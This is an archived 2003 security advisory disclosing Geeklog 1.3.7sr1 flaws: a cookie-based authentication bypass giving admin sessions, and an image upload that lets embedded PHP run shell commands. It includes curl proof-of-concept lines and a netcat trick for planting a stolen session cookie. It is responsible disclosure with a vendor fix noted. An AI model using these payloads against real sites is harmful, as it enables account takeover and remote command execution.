[VulnWatch] Geeklog 1.3.7sr1 and below multiple vulnerabilities.

From: pokleyzz (pokleyzz_at_scan-associates.net)
Date: 05/29/03

  • Next message: pokleyzz: "[VulnWatch] b2 cafelog 0.6.1 remote command execution."
    Date: Thu, 29 May 2003 13:02:55 +0800
    To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
    
    
    

    Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
    Date: 29 May 2003
    Author: pokleyzz <pokleyzz_at_scan-associates.net>
    Contributors: sk_at_scan-associates.net
                    shaharil_at_scan-associates.net
                    munir_at_scan-associates.net
    URL: http://www.scan-associates.net

    Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

    Description
    ===========
    Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your
    own virtual community area, complete with user administration, story posting,
    messaging, comments, polls, calendar, weblinks, and more! It can run on many
    different operating systems, and uses PHP4 and MySQL.

    Details
    =======
    i) SQL Integer manipulation in authentication script.

    from lib-sessions.php line 128 ------------------------------------------------

           if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
               // Session cookie doesn't exist but a perminant cookie does.
               // Start a new session cookie;
               if ($_SESS_VERBOSE) {
                   COM_errorLog('perm cookie found from lib-common.php',1);
               }

               $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
               $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

               //echo $userid;

               $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

               if ($cookie_password <> $userpass) {
                   // User could have modified UID in cookie, don't do shit

               } else {
                   if ($userid) {
                       $user_logged_in = 1;
                       //echo $userid;
                       // Create new session and write cookie
                       $sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                       SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
                       $userdata = SESS_getUserDataFromId($userid);
                       $_USER = $userdata;
                   }
               }
           }

    ------------------------------------------------------------------------

    In this case :
    DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
    "SELECT passwd from $_TABLES['users'] where uid=$userid"

    When we supply non-existance user we can by pass the ($cookie_password <> $userpass)
    cause $userpass and $cookie_password will be null.

    example:
            curl -b geeklog=9999 http://blablaba/users.php

    SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
    will execute SQL query
    "INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

    valid session for user 9999 which is not exist will insert to database;

    Integer manipulation to get admin access
    ----------------------------------------
    By supplying floating point number as userid, user can easily login as any geeklog
    user. This is because userid is integer value in database and floating point number
    always give null value for $userpass (non-existance user) . 2.1 will insert as 2 in
    column with integer data type.

    proof of concept:
            curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

    header.txt will contain valid session for admin.

    ii) Upload image with any extension.

    There is lack in error checking for upload image scripts where user can upload valid
    with any extention ( users and stories module). User supplied extension will be used
    for images extension. By embed php code in image user can execute any command as apache
    user on remote server.

    proof of concept:
            i) Upload attached file to server using "Internet Explorer". "Internet Explorer"
                will use file header to generate mime-type for uploaded file.
            ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php

    Vendor Response
    ===============
    Vendor has been contacted on 19/05/2003 and fix version is available
    http://www.geeklog.net

    Tips
    ====
    Simple way to trick mozilla to store session from any site.

    i) Edit header.txt.

    ----------------header.txt -------------------------

    HTTP/1.1 200 OK
    Date: Sat, 17 May 2003 16:15:23 GMT
    Server: Apache
    Set-Cookie: gl_session=1828197392; path=/
    Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
    path=/
    Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
    GMT; path=/; domain=http://blablabla/
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=iso-8859-1

    10
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    ----------------header.txt --------------------------

    ii) Using netcat netcat
            # nc -l -p 9090 < header.txt

    iii) Set your mozilla http proxy server to 127.0.0.1:9090

    iii) Browse to http://blablaba.com/

    iv) Unset proxy and browse to http://blablabla.com


  • Next message: pokleyzz: "[VulnWatch] b2 cafelog 0.6.1 remote command execution."